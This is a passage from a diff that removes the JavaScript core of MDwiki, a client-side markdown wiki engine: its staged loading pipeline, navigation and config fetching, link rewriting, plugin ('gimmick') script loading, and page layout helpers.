-            self.events.push(fn);
-        };
-        self.unsubscribe = function(fn) {
-            self.events.remove(fn);
-        };
-
-        self.executeSubscribedFn = function (fn) {
-            var d = $.Deferred();
-            self.outstanding.push(d);
-
-            // display an error if our done() callback is not called
-            $.md.util.wait(2500).done(function() {
-                if(d.state() !== 'resolved') {
-                    log.fatal('Timeout reached for done callback in stage: ' + self.name +
-                        '. Did you forget a done() call in a .subscribe() ?');
-                    log.fatal('stage ' + name + ' failed running subscribed function: ' + fn );
-                }
-            });
-
-            var done = function() {
-                d.resolve();
-            };
-            fn(done);
-        };
-
-        self.run = function() {
-            self.started = true;
-            $(self.events).each(function (i,fn) {
-                self.executeSubscribedFn(fn);
-            });
-
-            // if no events are in our queue, we resolve immediately
-            if (self.outstanding.length === 0) {
-                self.resolve();
-            }
-
-            // we resolve when all our registered events have completed
-            $.when.apply($, self.outstanding)
-            .done(function() {
-                self.resolve();
-            })
-            .fail(function() {
-                self.resolve();
-            });
-        };
-
-        self.done(function() {
-            log.debug('stage ' + self.name + ' completed successfully.');
-        });
-        self.fail(function() {
-            log.debug('stage ' + self.name + ' completed with errors!');
-        });
-        return self;
-    };
-}(jQuery));
-
-(function($) {
-    'use strict';
-
-    var log = $.md.getLogger();
-
-    function init() {
-        $.md.stages = [
-            $.Stage('init'),
-
-            // loads config, initial markdown and navigation
-            $.Stage('load'),
-
-            // will transform the markdown to html
-            $.Stage('transform'),
-
-            // HTML transformation finished
-            $.Stage('ready'),
-
-            // after we have a polished html skeleton
-            $.Stage('skel_ready'),
-
-            // will bootstrapify the skeleton
-            $.Stage('bootstrap'),
-
-            // before we run any gimmicks
-            $.Stage('pregimmick'),
-
-            // after we have bootstrapified the skeleton
-            $.Stage('gimmick'),
-
-            // postprocess
-            $.Stage('postgimmick'),
-
-            $.Stage('all_ready'),
-
-            // used for integration tests, not intended to use in MDwiki itself
-            $.Stage('final_tests')
-        ];
-
-        $.md.stage = function(name) {
-            var m = $.grep($.md.stages, function(e,i) {
-                return e.name === name;
-            });
-            if (m.length === 0) {
-                $.error('A stage by name ' + name + '  does not exist');
-            } else {
-                return m[0];
-            }
-        };
-    }
-    init();
-
-    function resetStages() {
-        var old_stages = $.md.stages;
-        $.md.stages = [];
-        $(old_stages).each(function(i,e) {
-            $.md.stages.push($.Stage(e.name));
-        });
-    }
-
-    var publicMethods = {};
-    $.md.publicMethods = $.extend ({}, $.md.publicMethods, publicMethods);
-
-    function transformMarkdown (markdown) {
-        var options = {
-            gfm: true,
-            tables: true,
-            breaks: true
-        };
-        if ($.md.config.lineBreaks === 'original')
-            options.breaks = false;
-        else if ($.md.config.lineBreaks === 'gfm')
-            options.breaks = true;
-
-        marked.setOptions(options);
-
-        // get sample markdown
-        var uglyHtml = marked(markdown);
-        return uglyHtml;
-    }
-
-    function registerFetchMarkdown() {
-
-        var md = '';
-
-        $.md.stage('init').subscribe(function(done) {
-            var ajaxReq = {
-                url: $.md.mainHref,
-                dataType: 'text'
-            };
-            $.ajax(ajaxReq).done(function(data) {
-                // TODO do this elsewhere
-                md = data;
-                done();
-            }).fail(function() {
-                var log = $.md.getLogger();
-                log.fatal('Could not get ' + $.md.mainHref);
-                done();
-            });
-        });
-
-        // find baseUrl
-        $.md.stage('transform').subscribe(function(done) {
-            var len = $.md.mainHref.lastIndexOf('/');
-            var baseUrl = $.md.mainHref.substring(0, len+1);
-            $.md.baseUrl = baseUrl;
-            done();
-        });
-
-        $.md.stage('transform').subscribe(function(done) {
-            var uglyHtml = transformMarkdown(md);
-            $('#md-content').html(uglyHtml);
-            md = '';
-            var dfd = $.Deferred();
-            loadExternalIncludes(dfd);
-            dfd.always(function () {
-                done();
-            });
-        });
-    }
-
-    // load [include](/foo/bar.md) external links
-    function loadExternalIncludes(parent_dfd) {
-
-        function findExternalIncludes () {
-            return $('a').filter (function () {
-                var href = $(this).attr('href');
-                var text = $(this).toptext();
-                var isMarkdown = $.md.util.hasMarkdownFileExtension(href);
-                var isInclude = text === 'include';
-                var isPreview = text.startsWith('preview:');
-                return (isInclude || isPreview) && isMarkdown;
-            });
-        }
-
-        function selectPreviewElements ($jqcol, num_elements) {
-            function isTextNode(node) {
-                return node.nodeType === 3;
-            }
-            var count = 0;
-            var elements = [];
-            $jqcol.each(function (i,e) {
-                if (count < num_elements) {
-                    elements.push(e);
-                    if (!isTextNode(e)) count++;
-                }
-            });
-            return $(elements);
-        }
-
-        var external_links = findExternalIncludes ();
-        // continue execution when all external resources are fully loaded
-        var latch = $.md.util.countDownLatch (external_links.length);
-        latch.always (function () {
-            parent_dfd.resolve();
-        });
-
-        external_links.each(function (i,e) {
-            var $el = $(e);
-            var href = $el.attr('href');
-            var text = $el.toptext();
-
-            $.ajax({
-                url: href,
-                dataType: 'text'
-            })
-            .done(function (data) {
-                var $html = $(transformMarkdown(data));
-                if (text.startsWith('preview:')) {
-                    // only insert the selected number of paragraphs; default 3
-                    var num_preview_elements = parseInt(text.substring(8), 10) ||3;
-                    var $preview = selectPreviewElements ($html, num_preview_elements);
-                    $preview.last().append('<a href="' + href +'"> ...read more &#10140;</a>');
-                    $preview.insertBefore($el.parent('p').eq(0));
-                    $el.remove();
-                } else {
-                    $html.insertAfter($el.parents('p'));
-                    $el.remove();
-                }
-            }).always(function () {
-                latch.countDown();
-            });
-        });
-    }
-
-    function isSpecialLink(href) {
-        if (!href) return false;
-
-        if (href.lastIndexOf('data:') >= 0)
-            return true;
-
-        if (href.startsWith('mailto:'))
-            return true;
-
-        if (href.startsWith('file:'))
-            return true;
-
-        if (href.startsWith('ftp:'))
-            return true;
-
-        // TODO capture more special links: every non-http link with : like
-        // torrent:// etc.
-    }
-
-    // modify internal links so we load them through our engine
-    function processPageLinks(domElement, baseUrl) {
-        var html = $(domElement);
-        if (baseUrl === undefined) {
-            baseUrl = '';
-        }
-        // HACK against marked: empty links will have empy href attribute
-        // we remove the href attribute from the a tag
-        html.find('a').not('#md-menu a').filter(function () {
-            var $this = $(this);
-            var attr = $this.attr('href');
-            if (!attr || attr.length === 0)
-                $this.removeAttr('href');
-        });
-
-        html.find('a, img').each(function(i,e) {
-            var link = $(e);
-            // link must be jquery collection
-            var isImage = false;
-            var hrefAttribute = 'href';
-
-            if (!link.attr(hrefAttribute)) {
-                isImage = true;
-                hrefAttribute = 'src';
-            }
-            var href = link.attr(hrefAttribute);
-
-            if (href && href.lastIndexOf ('#!') >= 0)
-                return;
-
-            if (isSpecialLink(href))
-                return;
-
-            if (!isImage && href.startsWith ('#') && !href.startsWith('#!')) {
-                // in-page link
-                link.click(function(ev) {
-                    ev.preventDefault();
-                    $.md.scrollToInPageAnchor (href);
-                });
-            }
-
-            if (! $.md.util.isRelativeUrl(href))
-                return;
-
-            if (isImage && ! $.md.util.isRelativePath(href))
-                return;
-
-            if (!isImage && $.md.util.isGimmickLink(link))
-                return;
-
-            function build_link (url) {
-                if ($.md.util.hasMarkdownFileExtension (url))
-                    return '#!' + url;
-                else
-                    return url;
-            }
-
-            var newHref = baseUrl + href;
-            if (isImage)
-                link.attr(hrefAttribute, newHref);
-            else if ($.md.util.isRelativePath (href))
-                link.attr(hrefAttribute, build_link(newHref));
-            else
-                link.attr(hrefAttribute, build_link(href));
-        });
-    }
-
-    var navMD = '';
-    $.md.NavigationDfd = $.Deferred();
-    var ajaxReq = {
-        url: 'navigation.md',
-        dataType: 'text'
-    };
-    $.ajax(ajaxReq).done(function(data) {
-        navMD = data;
-        $.md.NavigationDfd.resolve();
-    }).fail(function() {
-        $.md.NavigationDfd.reject();
-    });
-
-    function registerBuildNavigation() {
-
-        $.md.stage('init').subscribe(function(done) {
-            $.md.NavigationDfd.done(function() {
-                done();
-            })
-            .fail(function() {
-                done();
-            });
-        });
-
-        $.md.stage('transform').subscribe(function(done) {
-            if (navMD === '') {
-                var log = $.md.getLogger();
-                log.info('no navgiation.md found, not using a navbar');
-                done();
-                return;
-            }
-
-            var navHtml = marked(navMD);
-            // TODO why are <script> tags from navHtml APPENDED to the jqcol?
-            var $h = $('<div>' + navHtml + '</div>');
-
-            // insert <scripts> from navigation.md into the DOM
-            $h.each(function (i,e) {
-                if (e.tagName === 'SCRIPT') {
-                    $('script').first().before(e);
-                }
-            });
-
-            // TODO .html() is evil!!!
-            var $navContent = $h.eq(0);
-            $navContent.find('p').each(function(i,e) {
-                var $el = $(e);
-                $el.replaceWith($el.html());
-            });
-            $('#md-menu').append($navContent.html());
-            done();
-        });
-
-        $.md.stage('bootstrap').subscribe(function(done) {
-            processPageLinks($('#md-menu'));
-            done();
-        });
-
-        $.md.stage('postgimmick').subscribe(function(done) {
-            var num_links = $('#md-menu a').length;
-            var has_header = $('#md-menu .navbar-brand').eq(0).toptext().trim().length > 0;
-            if (!has_header && num_links <= 1)
-                $('#md-menu').hide();
-
-            done();
-        });
-    }
-
-    $.md.ConfigDfd = $.Deferred();
-    $.ajax({url: 'config.json', dataType: 'text'}).done(function(data) {
-        try {
-            var data_json = JSON.parse(data);
-            $.md.config = $.extend($.md.config, data_json);
-            log.info('Found a valid config.json file, using configuration');
-        } catch(err) {
-            log.error('config.json was not JSON parsable: ' + err);
-        }
-        $.md.ConfigDfd.resolve();
-    }).fail(function(err, textStatus) {
-        log.error('unable to retrieve config.json: ' + textStatus);
-        $.md.ConfigDfd.reject();
-    });
-    function registerFetchConfig() {
-
-        $.md.stage('init').subscribe(function(done) {
-            // TODO 404 won't get cached, requesting it every reload is not good
-            // maybe use cookies? or disable re-loading of the page
-            //$.ajax('config.json').done(function(data){
-            $.md.ConfigDfd.done(function(){
-                done();
-            }).fail(function() {
-                var log = $.md.getLogger();
-                log.info('No config.json found, using default settings');
-                done();
-            });
-        });
-    }
-
-    function registerClearContent() {
-
-        $.md.stage('init').subscribe(function(done) {
-            $('#md-all').empty();
-            var skel ='<div id="md-body"><div id="md-title"></div><div id="md-menu">'+
-                '</div><div id="md-content"></div></div>';
-            $('#md-all').prepend($(skel));
-            done();
-        });
-
-    }
-    function loadContent(href) {
-        $.md.mainHref = href;
-
-        registerFetchMarkdown();
-        registerClearContent();
-
-        // find out which link gimmicks we need
-        $.md.stage('ready').subscribe(function(done) {
-            $.md.initializeGimmicks();
-            $.md.registerLinkGimmicks();
-            done();
-        });
-
-        // wire up the load method of the modules
-        $.each($.md.gimmicks, function(i, module) {
-            if (module.load === undefined) {
-                return;
-            }
-            $.md.stage('load').subscribe(function(done) {
-                module.load();
-                done();
-            });
-        });
-
-        $.md.stage('ready').subscribe(function(done) {
-            $.md('createBasicSkeleton');
-            done();
-        });
-
-        $.md.stage('bootstrap').subscribe(function(done){
-            $.mdbootstrap('bootstrapify');
-            processPageLinks($('#md-content'), $.md.baseUrl);
-            done();
-        });
-        runStages();
-    }
-
-    function runStages() {
-
-        // wire the stages up
-        $.md.stage('init').done(function() {
-            $.md.stage('load').run();
-        });
-        $.md.stage('load').done(function() {
-            $.md.stage('transform').run();
-        });
-        $.md.stage('transform').done(function() {
-            $.md.stage('ready').run();
-        });
-        $.md.stage('ready').done(function() {
-            $.md.stage('skel_ready').run();
-        });
-        $.md.stage('skel_ready').done(function() {
-            $.md.stage('bootstrap').run();
-        });
-        $.md.stage('bootstrap').done(function() {
-            $.md.stage('pregimmick').run();
-        });
-        $.md.stage('pregimmick').done(function() {
-            $.md.stage('gimmick').run();
-        });
-        $.md.stage('gimmick').done(function() {
-            $.md.stage('postgimmick').run();
-        });
-        $.md.stage('postgimmick').done(function() {
-            $.md.stage('all_ready').run();
-        });
-        $.md.stage('all_ready').done(function() {
-            $('html').removeClass('md-hidden-load');
-
-            // phantomjs hook when we are done
-            if (typeof window.callPhantom === 'function') {
-                window.callPhantom({});
-            }
-
-            $.md.stage('final_tests').run();
-        });
-        $.md.stage('final_tests').done(function() {
-            // reset the stages for next iteration
-            resetStages();
-
-            // required by dalekjs so we can wait the element to appear
-            $('body').append('<span id="start-tests"></span>');
-            $('#start-tests').hide();
-        });
-
-        // trigger the whole process by runing the init stage
-        $.md.stage('init').run();
-        return;
-    }
-
-    function extractHashData() {
-        // first char is the # or #!
-        var href;
-        if (window.location.hash.startsWith('#!')) {
-            href = window.location.hash.substring(2);
-        } else {
-            href = window.location.hash.substring(1);
-        }
-        href = decodeURIComponent(href);
-
-        // extract possible in-page anchor
-        var ex_pos = href.indexOf('#');
-        if (ex_pos !== -1) {
-            $.md.inPageAnchor = href.substring(ex_pos + 1);
-            $.md.mainHref = href.substring(0, ex_pos);
-        } else {
-            $.md.mainHref = href;
-        }
-    }
-
-    function appendDefaultFilenameToHash () {
-        var newHashString = '';
-        var currentHashString = window.location.hash || '';
-        if (currentHashString === '' ||
-            currentHashString === '#'||
-            currentHashString === '#!')
-        {
-            newHashString = '#!index.md';
-        }
-        else if (currentHashString.startsWith ('#!') &&
-                 currentHashString.endsWith('/')
-                ) {
-            newHashString = currentHashString + 'index.md';
-        }
-        if (newHashString)
-            window.location.hash = newHashString;
-    }
-
-    $(document).ready(function () {
-
-        // stage init stuff
-        registerFetchConfig();
-        registerBuildNavigation();
-        extractHashData();
-
-        appendDefaultFilenameToHash();
-
-        $(window).bind('hashchange', function () {
-            window.location.reload(false);
-        });
-
-        loadContent($.md.mainHref);
-    });
-}(jQuery));
-
-(function($) {
-    var publicMethods = {
-        isRelativeUrl: function(url) {
-            if (url === undefined) {
-                return false;
-            }
-            // if there is :// in it, its considered absolute
-            // else its relative
-            if (url.indexOf('://') === -1) {
-                return true;
-            } else {
-                return false;
-            }
-        },
-        isRelativePath: function(path) {
-            if (path === undefined)
-                return false;
-            if (path.startsWith('/'))
-                return false;
-            return true;
-        },
-        isGimmickLink: function(domAnchor) {
-            if (domAnchor.toptext().indexOf ('gimmick:') !== -1) {
-                return true;
-            } else {
-                return false;
-            }
-        },
-        hasMarkdownFileExtension: function (str) {
-            var markdownExtensions = [ '.md', '.markdown', '.mdown' ];
-            var result = false;
-            var value = str.toLowerCase().split('#')[0];
-            $(markdownExtensions).each(function (i,ext) {
-                if (value.toLowerCase().endsWith (ext)) {
-                    result = true;
-                }
-            });
-            return result;
-        },
-        wait: function(time) {
-            return $.Deferred(function(dfd) {
-                setTimeout(dfd.resolve, time);
-            });
-        }
-    };
-    $.md.util = $.extend ({}, $.md.util, publicMethods);
-
-    if (typeof String.prototype.startsWith !== 'function') {
-        String.prototype.startsWith = function(str) {
-            return this.slice(0, str.length) === str;
-        };
-    }
-    if (typeof String.prototype.endsWith !== 'function') {
-        String.prototype.endsWith = function(str) {
-            return this.slice(this.length - str.length, this.length) === str;
-        };
-    }
-
-    $.fn.extend ({
-        toptext: function () {
-            return this.clone().children().remove().end().text();
-        }
-    });
-
-    // adds a :icontains selector to jQuery that is case insensitive
-    $.expr[':'].icontains = $.expr.createPseudo(function(arg) {
-        return function(elem) {
-            return $(elem).toptext().toUpperCase().indexOf(arg.toUpperCase()) >= 0;
-        };
-    });
-
-    $.md.util.getInpageAnchorText = function (text) {
-        var subhash = text.replace(/ /g, '_');
-        // TODO remove more unwanted characters like ?/,- etc.
-        return subhash;
-
-    };
-    $.md.util.getInpageAnchorHref = function (text, href) {
-        href = href || $.md.mainHref;
-        var subhash = $.md.util.getInpageAnchorText(text);
-        return '#!' + href + '#' + subhash;
-    };
-
-    $.md.util.repeatUntil = function (interval, predicate, maxRepeats) {
-        maxRepeats = maxRepeats || 10;
-        var dfd = $.Deferred();
-        function recursive_repeat (interval, predicate, maxRepeats) {
-            if (maxRepeats === 0) {
-                dfd.reject();
-                return;
-            }
-            if (predicate()) {
-                dfd.resolve();
-                return;
-            } else {
-                $.md.util.wait(interval).always(function () {
-                    recursive_repeat(interval, predicate, maxRepeats - 1);
-                });
-            }
-        }
-        recursive_repeat(interval, predicate, maxRepeats);
-        return dfd;
-    };
-
-    // a count-down latch as in Java7.
-    $.md.util.countDownLatch = function (capacity, min) {
-        min = min || 0;
-        var dfd = $.Deferred();
-        if (capacity <= min) dfd.resolve();
-        dfd.capacity = capacity;
-        dfd.countDown = function () {
-            dfd.capacity--;
-            if (dfd.capacity <= min)
-                dfd.resolve();
-        };
-        return dfd;
-    };
-
-}(jQuery));
-
-(function($) {
-    'use strict';
-
-    // PUBLIC API
-    $.md.registerGimmick = function(module) {
-        $.md.gimmicks.push(module);
-        return;
-    };
-
-    // registers a script for a gimmick, that is later dynamically loaded
-    // by the core.
-    // src may be an URL or direct javascript sourcecode. When options.callback
-    // is provided, the done() function is passed to the function and needs to
-    // be called.
-    $.md.registerScript = function(module, src, options) {
-        var scriptinfo = new ScriptInfo({
-            module: module,
-            src: src,
-            options: options
-        });
-        registeredScripts.push(scriptinfo);
-    };
-
-    // same as registerScript but for css. Note that we do not provide a
-    // callback when the load finishes
-    $.md.registerCss = function(module, url, options) {
-        var license = options.license,
-            stage = options.stage || 'skel_ready',
-            callback = options.callback;
-
-        checkLicense(license, module);
-        var tag = '<link rel="stylesheet" href="' + url + '" type="text/css"></link>';
-        $.md.stage(stage).subscribe(function(done) {
-            $('head').append(tag);
-            if (callback !== undefined) {
-                callback(done);
-            } else {
-                done();
-            }
-        });
-    };
-
-    // turns hostname/path links into http://hostname/path links
-    // we need to do this because if accessed by file:///, we need a different
-    // transport scheme for external resources (like http://)
-    $.md.prepareLink = function(link, options) {
-        options = options || {};
-        var ownProtocol = window.location.protocol;
-
-        if (options.forceSSL)
-            return 'https://' + link;
-        if (options.forceHTTP)
-            return 'http://' + link;
-
-        if (ownProtocol === 'file:') {
-            return 'http://' + link;
-        }
-        // default: use the same as origin resource
-        return '//' + link;
-    };
-
-    // associate a link trigger for a gimmick. i.e. [gimmick:foo]() then
-    // foo is the trigger and will invoke the corresponding gimmick
-    $.md.linkGimmick = function(module, trigger, callback, stage) {
-        if (stage === undefined) {
-            stage = 'gimmick';
-        }
-        var linktrigger = new LinkTrigger({
-            trigger: trigger,
-            module: module,
-            stage: stage,
-            callback: callback
-        });
-        linkTriggers.push(linktrigger);
-    };
-
-    $.md.triggerIsActive = function(trigger) {
-        if (activeLinkTriggers.indexOf(trigger) === -1) {
-            return false;
-        } else {
-            return true;
-        }
-    };
-
-    var initialized = false;
-    // TODO combine main.js and modules.js closure
-    $.md.initializeGimmicks = function() {
-        findActiveLinkTrigger();
-        runGimmicksOnce();
-        loadRequiredScripts();
-    };
-
-    // END PUBLIC API
-
-
-    var log = $.md.getLogger();
-
-    // triggers that we actually found on the page
-    // array of string
-    var activeLinkTriggers = [];
-
-
-    // array of ScriptInfo
-    var registeredScripts = [];
-    function ScriptInfo(initial) {
-        this.module = undefined;
-        this.options = {};
-
-        // can ba an URL or javascript sourcecode
-        this.src = '';
-
-        $.extend(this, initial);
-    }
-
-    // array of linkTriggers
-    var linkTriggers = [];
-    function LinkTrigger(initial) {
-        this.trigger = undefined;
-        this.module = undefined;
-        this.callback = undefined;
-
-        $.extend(this, initial);
-    }
-
-    // jQuery does some magic when inserting inline scripts, so better
-    // use vanilla JS. See:
-    // http://stackoverflow.com/questions/610995/jquery-cant-append-script-element
-    function insertInlineScript(src) {
-        // scripts always need to go directly into the DOM
-        var script = document.createElement('script');
-        script.type = 'text/javascript';
-        script.text = src;
-        document.body.appendChild(script);
-    }
-
-    // since we are GPL, we have to be cautious what other scripts we load
-    // as delivering to the browser is considered delivering a derived work
-    var licenses = ['MIT', 'BSD', 'GPL', 'GPL2', 'GPL3', 'LGPL', 'LGPL2',
-        'APACHE2', 'PUBLICDOMAIN', 'EXCEPTION', 'OTHER'
-    ];
-    function checkLicense(license, module) {
-        if ($.inArray(license, licenses) === -1) {
-            var availLicenses = JSON.stringify(licenses);
-            log.warn('license ' + license + ' is not known.');
-            log.warn('Known licenses:' + availLicenses);
-
-        } else if (license === 'OTHER') {
-            log.warn('WARNING: Module ' + module.name + ' uses a script'+
-                ' with unknown license. This may be a GPL license violation if'+
-                ' this website is publically available!');
-        }
-    }
-
-    // will actually schedule the script load into the DOM.
-    function loadScript(scriptinfo) {
-
-        var module = scriptinfo.module,
-            src = scriptinfo.src,
-            options = scriptinfo.options;
-
-        var license = options.license || 'OTHER',
-            loadstage = options.loadstage || 'skel_ready',
-            finishstage = options.finishstage || 'pregimmick',
-            callback = options.callback;
-
-        var loadDone = $.Deferred();
-
-        checkLicense(license, module);
-        // start script loading
-        log.debug('subscribing ' + module.name + ' to start: ' + loadstage + ' end in: ' + finishstage);
-        $.md.stage(loadstage).subscribe(function(done) {
-            if (src.startsWith('//') || src.startsWith('http')) {
-                $.getScript(src, function() {
-                    if (callback !== undefined) {
-                        callback(done);
-                    } else {
-                        log.debug('module' + module.name + ' script load done: ' + src);
-                        done();
-                    }
-                    loadDone.resolve();
-                });
-            } else {
-                // inline script that we directly insert
-                insertInlineScript(src);
-                log.debug('module' + module.name + ' script inject done');
-                loadDone.resolve();
-                done();
-            }
-        });
-        // if loading is not yet finished in stage finishstage, wait
-        // for the loading to complete
-        $.md.stage(finishstage).subscribe(function(done) {
-            loadDone.done(function() {
-                done();
-            });
-        });
-    }
-
-    // finds out that kind of trigger words are acutally used on a given page
-    // this is most likely a very small subset of all available gimmicks
-    function findActiveLinkTrigger() {
-        var $gimmicks = $('a:icontains(gimmick:)');
-        $gimmicks.each(function(i,e) {
-            var parts = getGimmickLinkParts($(e));
-            if (activeLinkTriggers.indexOf(parts.trigger) === -1) {
-                activeLinkTriggers.push(parts.trigger);
-            }
-        });
-        log.debug('Scanning for required gimmick links: ' + JSON.stringify(activeLinkTriggers));
-    }
-
-    function loadRequiredScripts() {
-        // find each module responsible for the link trigger
-        $.each(activeLinkTriggers, function(i,trigger) {
-            var module = findModuleByTrigger(trigger);
-            if (module === undefined) {
-                log.error('Gimmick link: "' + trigger + '" found but no suitable gimmick loaded');
-                return;
-            }
-            var scriptinfo = registeredScripts.filter(function(info) {
-                return info.module.name === module.name;
-            })[0];
-            // register to load the script
-            if (scriptinfo !== undefined) {
-                loadScript(scriptinfo);
-            }
-        });
-    }
-
-    function findModuleByTrigger(trigger) {
-        var ret;
-        $.each(linkTriggers, function(i,e) {
-            if (e.trigger === trigger) {
-                ret = e.module;
-            }
-        });
-        return ret;
-    }
-
-    function getGimmickLinkParts($link) {
-        var link_text = $.trim($link.toptext());
-        // returns linkTrigger, options, linkText
-        if (link_text.match(/gimmick:/i) === null) {
-            return null;
-        }
-        var href = $.trim($link.attr('href'));
-        var r = new RegExp(/gimmick:\s*([^(\s]*)\s*(\(\s*{?(.*)\s*}?\s*\))*/i);
-        var matches = r.exec(link_text);
-        if (matches === null || matches[1] === undefined) {
-            $.error('Error matching a gimmick: ' + link_text);
-            return null;
-        }
-        var trigger = matches[1].toLowerCase();
-        var args = null;
-        // getting the parameters
-        if (matches[2] !== undefined) {
-            // remove whitespaces
-            var params = $.trim(matches[3].toString());
-            // remove the closing } if present
-            if (params.charAt (params.length - 1) === '}') {
-                params = params.substring(0, params.length - 1);
-            }
-            // add surrounding braces and paranthese
-            params = '({' + params + '})';
-            // replace any single quotes by double quotes
-            params = params.replace(/'/g, '"');
-            // finally, try if the json object is valid
-            try {
-                /*jshint -W061 */
-                args = eval(params);
-            } catch (err) {
-                log.error('error parsing argument of gimmick: ' + link_text + 'giving error: ' + err);
-            }
-        }
-        return { trigger: trigger, options: args, href: href };
-    }
-
-    function runGimmicksOnce() {
-        // runs the once: callback for each gimmick within the init stage
-        $.each($.md.gimmicks, function(i, module) {
-            if (module.once === undefined) {
-                return;
-            }
-            module.once();
-        });
-    }
-
-    // activate all gimmicks on a page, that are contain the text gimmick:
-    // TODO make private / merge closures
-    $.md.registerLinkGimmicks = function () {
-        var $gimmick_links = $('a:icontains(gimmick:)');
-        $gimmick_links.each(function(i, e) {
-            var $link = $(e);
-            var gimmick_arguments = getGimmickLinkParts($link);
-
-            $.each(linkTriggers, function(i, linktrigger) {
-                if (gimmick_arguments.trigger === linktrigger.trigger) {
-                    subscribeLinkTrigger($link, gimmick_arguments, linktrigger);
-                }
-            });
-        });
-    };
-
-    function subscribeLinkTrigger($link, args, linktrigger) {
-        log.debug('Subscribing gimmick ' + linktrigger.module.name + ' to stage: ' + linktrigger.stage);
-
-        $.md.stage(linktrigger.stage).subscribe(function(done) {
-            args.options = args.options ||{};
-
-            // it is possible that broken modules or any other transformation removed the $link
-            // from the dom in the meantime
-            if (!jQuery.contains(document.documentElement, $link[0])) {
-                log.error ('LINK IS NOT IN THE DOM ANYMORE: ');
-                console.log($link);
-            }
-
-            log.debug('Running gimmick ' + linktrigger.module.name);
-            linktrigger.callback($link, args.options, args.href, done);
-
-            // if the gimmick didn't call done, we trigger it here
-            done();
-        });
-    }
-}(jQuery));
-
-(function($) {
-    var publicMethods = {
-        createBasicSkeleton: function() {
-
-            setPageTitle();
-            wrapParagraphText();
-            linkImagesToSelf();
-            groupImages();
-            removeBreaks();
-            addInpageAnchors ();
-
-            $.md.stage('all_ready').subscribe(function(done) {
-                if ($.md.inPageAnchor !== '') {
-                    $.md.util.wait(500).then(function () {
-                        $.md.scrollToInPageAnchor($.md.inPageAnchor);
-                    });
-                }
-                done();
-            });
-            return;
-
-        }
-    };
-    $.md.publicMethods = $.extend ({}, $.md.publicMethods, publicMethods);
-
-    // set the page title to the browser document title, optionally picking
-    // the first h1 element as title if no title is given
-    function setPageTitle() {
-        var $pageTitle;
-        if ($.md.config.title)
-            $('title').text($.md.config.title);
-
-        $pageTitle = $('#md-content h1').eq(0);
-        if ($.trim($pageTitle.toptext()).length > 0) {
-            $('#md-title').prepend($pageTitle);
-            var title = $pageTitle.toptext();
-            // document.title = title;
-        } else {
-            $('#md-title').remove();
-        }
-    }
-    function wrapParagraphText () {
-        // TODO is this true for marked.js?
-
-        // markdown gives us sometime paragraph that contain child tags (like img),
-        // but the containing text is not wrapped. Make sure to wrap the text in the
-        // paragraph into a <div>
-
-		// this also moves ANY child tags to the front of the paragraph!
-		$('#md-content p').each (function () {
-			var $p = $(this);
-			// nothing to do for paragraphs without text
-			if ($.trim($p.text ()).length === 0) {
-				// make sure no whitespace are in the p and then exit
-				//$p.text ('');
-				return;
-			}
-			// children elements of the p
-            var children = $p.contents ().filter (function () {
-                var $child =  $(this);
-                // we extract images and hyperlinks with images out of the paragraph
-                if (this.tagName === 'A' && $child.find('img').length > 0) {
-                    return true;
-                }
-                if (this.tagName === 'IMG') {
-                    return true;
-                }
-                // else
-                return false;
-            });
-            var floatClass = getFloatClass($p);
-            $p.wrapInner ('<div class="md-text" />');
-
-            // if there are no children, we are done
-            if (children.length === 0) {
-                return;
-            }
-            // move the children out of the wrapped div into the original p
-            children.prependTo($p);
-
-            // at this point, we now have a paragraph that holds text AND images
-            // we mark that paragraph to be a floating environment
-            // TODO determine floatenv left/right
-            $p.addClass ('md-floatenv').addClass (floatClass);
-		});
-	}
-	function removeBreaks (){
-		// since we use non-markdown-standard line wrapping, we get lots of
-		// <br> elements we don't want.
-
-        // remove a leading <br> from floatclasses, that happen to
-        // get insertet after an image
-        $('.md-floatenv').find ('.md-text').each (function () {
-            var $first = $(this).find ('*').eq(0);
-            if ($first.is ('br')) {
-                $first.remove ();
-            }
-        });
-
-        // remove any breaks from image groups
-        $('.md-image-group').find ('br').remove ();
-    }
-	function getFloatClass (par) {
-		var $p = $(par);
-		var floatClass = '';
-
-		// reduce content of the paragraph to images
-		var nonTextContents = $p.contents().filter(function () {
-			if (this.tagName === 'IMG' || this.tagName === 'IFRAME') {
-                return true;
-            }
-			else if (this.tagName === 'A') {
-                return $(this).find('img').length > 0;
-            }
-			else {
-				return $.trim($(this).text ()).length > 0;
-			}
-		});
-		// check the first element - if its an image or a link with image, we go left
-		var elem = nonTextContents[0];
-		if (elem !== undefined && elem !== null) {
-			if (elem.tagName === 'IMG' || elem.tagName === 'IFRAME') {
-                floatClass = 'md-float-left';
-            }
-			else if (elem.tagName === 'A' && $(elem).find('img').length > 0) {
-                floatClass = 'md-float-left';
-            }
-			else {
-                floatClass = 'md-float-right';
-            }
-		}
-		return floatClass;
-	}
-    // images are put in the same image group as long as there is
-    // not separating paragraph between them
-    function groupImages() {
-        var par = $('p img').parents('p');
-        // add an .md-image-group class to the p
-        par.addClass('md-image-group');
-    }
-
-    // takes a standard <img> tag and adds a hyperlink to the image source
-    // needed since we scale down images via css and want them to be accessible
-    // in original format
-    function linkImagesToSelf () {
-        function selectNonLinkedImages () {
-            // only select images that do not have a non-empty parent link
-            $images = $('img').filter(function(index) {
-                var $parent_link = $(this).parents('a').eq(0);
-                if ($parent_link.length === 0) return true;
-                var attr = $parent_link.attr('href');
-                return (attr && attr.length === 0);
-            });
-            return $images;
-        }
-        var $images = selectNonLinkedImages ();
-        return $images.each(function() {
-            var $this = $(this);
-            var img_src = $this.attr('src');
-            var img_title = $this.attr('title');
-            if (img_title === undefined) {
-                img_title = '';
-            }
-            // wrap the <img> tag in an anchor and copy the title of the image
-            $this.wrap('<a class="md-image-selfref" href="' + img_src + '" title="'+ img_title +'"/> ');
-        });
-    }
-
-    function addInpageAnchors()
-    {
-        // adds a pilcrow (paragraph) character to heading with a link for the
-        // inpage anchor
-        function addPilcrow ($heading, href) {
-            var c = $.md.config.anchorCharacter;
-            var $pilcrow = $('<span class="anchor-highlight"><a>' + c + '</a></span>');
-            $pilcrow.find('a').attr('href', href);
-            $pilcrow.hide();
-
-            var mouse_entered = false;
-            $heading.mouseenter(function () {
-                mouse_entered = true;
-                $.md.util.wait(300).then(function () {
-                    if (!mouse_entered) return;
-                    $pilcrow.fadeIn(200);
-                });
-            });
-            $heading.mouseleave(function () {
-                mouse_entered = false;
-                $pilcrow.fadeOut(200);
-            });
-            $pilcrow.appendTo($heading);
-        }
-
-        // adds a link to the navigation at the top of the page
-        function addJumpLinkToTOC($heading) {
-            if($.md.config.useSideMenu === false) return;
